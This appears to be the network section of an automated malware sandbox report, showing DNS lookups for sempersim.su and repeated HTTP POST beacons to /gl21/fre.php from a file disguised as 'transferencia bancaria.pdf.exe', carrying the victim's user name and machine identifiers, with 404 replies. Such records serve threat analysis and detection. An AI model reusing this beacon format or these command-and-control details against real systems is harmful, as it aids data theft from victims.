                                      Nov 3, 2022 12:31:05.602891922 CET192.168.2.68.8.8.80xdc66Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:07.541344881 CET192.168.2.68.8.8.80x2825Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:09.419343948 CET192.168.2.68.8.8.80xa44cStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:11.161881924 CET192.168.2.68.8.8.80xbf26Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:22.519120932 CET192.168.2.68.8.8.80x8b48Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:25.278309107 CET192.168.2.68.8.8.80x6a31Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:27.427875996 CET192.168.2.68.8.8.80x81d8Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:29.125849009 CET192.168.2.68.8.8.80x5fdStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:30.955920935 CET192.168.2.68.8.8.80x984bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:32.930668116 CET192.168.2.68.8.8.80x5c96Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:35.521024942 CET192.168.2.68.8.8.80x9f71Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:37.538077116 CET192.168.2.68.8.8.80x396fStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:39.862227917 CET192.168.2.68.8.8.80xc65Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:41.802947998 CET192.168.2.68.8.8.80xe860Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:43.694916964 CET192.168.2.68.8.8.80x4f0dStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:45.492507935 CET192.168.2.68.8.8.80x845aStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:47.481296062 CET192.168.2.68.8.8.80xe70Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 3, 2022 12:30:06.635174990 CET8.8.8.8192.168.2.60x9698No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:11.910538912 CET8.8.8.8192.168.2.60x836No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:13.958684921 CET8.8.8.8192.168.2.60x6c7fNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:16.008389950 CET8.8.8.8192.168.2.60x898bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:18.222553015 CET8.8.8.8192.168.2.60xfd9No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:20.193391085 CET8.8.8.8192.168.2.60xb2c5No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:22.064102888 CET8.8.8.8192.168.2.60x3dfNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:25.332699060 CET8.8.8.8192.168.2.60x1b5bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:27.365106106 CET8.8.8.8192.168.2.60x744cNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:31.064527988 CET8.8.8.8192.168.2.60x679bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:32.924936056 CET8.8.8.8192.168.2.60x93fcNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:34.938977957 CET8.8.8.8192.168.2.60xf5b2No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:36.935085058 CET8.8.8.8192.168.2.60x4e0bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:41.802865028 CET8.8.8.8192.168.2.60x72fNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:45.724493027 CET8.8.8.8192.168.2.60x2cbbNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:47.958667994 CET8.8.8.8192.168.2.60x5480No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:50.754672050 CET8.8.8.8192.168.2.60xeac7No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:53.293008089 CET8.8.8.8192.168.2.60xa703No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:54.838155985 CET8.8.8.8192.168.2.60xb2a0No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:57.850481033 CET8.8.8.8192.168.2.60x101aNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:59.579384089 CET8.8.8.8192.168.2.60x26c2No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:01.189847946 CET8.8.8.8192.168.2.60x2de9No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:03.831717968 CET8.8.8.8192.168.2.60x997dNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:05.622453928 CET8.8.8.8192.168.2.60xdc66No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:07.558957100 CET8.8.8.8192.168.2.60x2825No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:09.438843966 CET8.8.8.8192.168.2.60xa44cNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:11.179299116 CET8.8.8.8192.168.2.60xbf26No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:22.538552046 CET8.8.8.8192.168.2.60x8b48No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:25.295921087 CET8.8.8.8192.168.2.60x6a31No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:27.445188999 CET8.8.8.8192.168.2.60x81d8No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:29.145350933 CET8.8.8.8192.168.2.60x5fdNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:30.976178885 CET8.8.8.8192.168.2.60x984bNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:32.949887991 CET8.8.8.8192.168.2.60x5c96No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:35.540065050 CET8.8.8.8192.168.2.60x9f71No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:37.555300951 CET8.8.8.8192.168.2.60x396fNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:39.879426956 CET8.8.8.8192.168.2.60xc65No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:41.821785927 CET8.8.8.8192.168.2.60xe860No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:43.714163065 CET8.8.8.8192.168.2.60x4f0dNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:45.510040045 CET8.8.8.8192.168.2.60x845aNo error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:47.499958038 CET8.8.8.8192.168.2.60xe70No error (0)sempersim.su91.142.77.45A (IP address)IN (0x0001)false
                                      • sempersim.su
                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.64970691.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:09.785093069 CET98OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 196
                                      Connection: close
                                      Nov 3, 2022 12:30:09.847696066 CET98OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: 'ckav.ruengineer405464DESKTOP-716T771k08F9C4E9C79A3B52B3F739430m9tzQ
                                      Nov 3, 2022 12:30:11.378333092 CET99INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:10 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 15
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.64970791.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:11.977904081 CET99OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 196
                                      Connection: close
                                      Nov 3, 2022 12:30:12.040091991 CET100OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: 'ckav.ruengineer405464DESKTOP-716T771+08F9C4E9C79A3B52B3F739430R25tl
                                      Nov 3, 2022 12:30:13.686108112 CET100INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:13 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 15
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      10192.168.2.64971691.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:32.992650986 CET113OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:33.057817936 CET113OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:34.572782040 CET114INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:34 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      11192.168.2.64971791.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:35.019959927 CET114OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:35.081929922 CET115OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:36.516442060 CET115INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:36 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      12192.168.2.64971891.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:37.003048897 CET116OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:37.065248966 CET116OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:37.371615887 CET116OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:37.684214115 CET117OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:38.293596983 CET117OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:39.512592077 CET117OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:41.067852974 CET118INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:38 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      13192.168.2.64971991.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:42.564459085 CET119OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:42.856527090 CET119OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:43.169044971 CET119OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:43.841007948 CET120OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:45.376826048 CET120INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:45 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      14192.168.2.64972091.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:45.793164968 CET121OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:45.855376005 CET121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:46.207489014 CET122OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:47.547245026 CET122INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:46 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      15192.168.2.64972191.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:48.032802105 CET123OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:48.325807095 CET123OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:48.638204098 CET123OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:50.362963915 CET124INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:49 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      16192.168.2.64972291.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:50.822443962 CET124OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:51.122917891 CET125OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:51.438905001 CET125OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:53.023996115 CET126INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:52 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
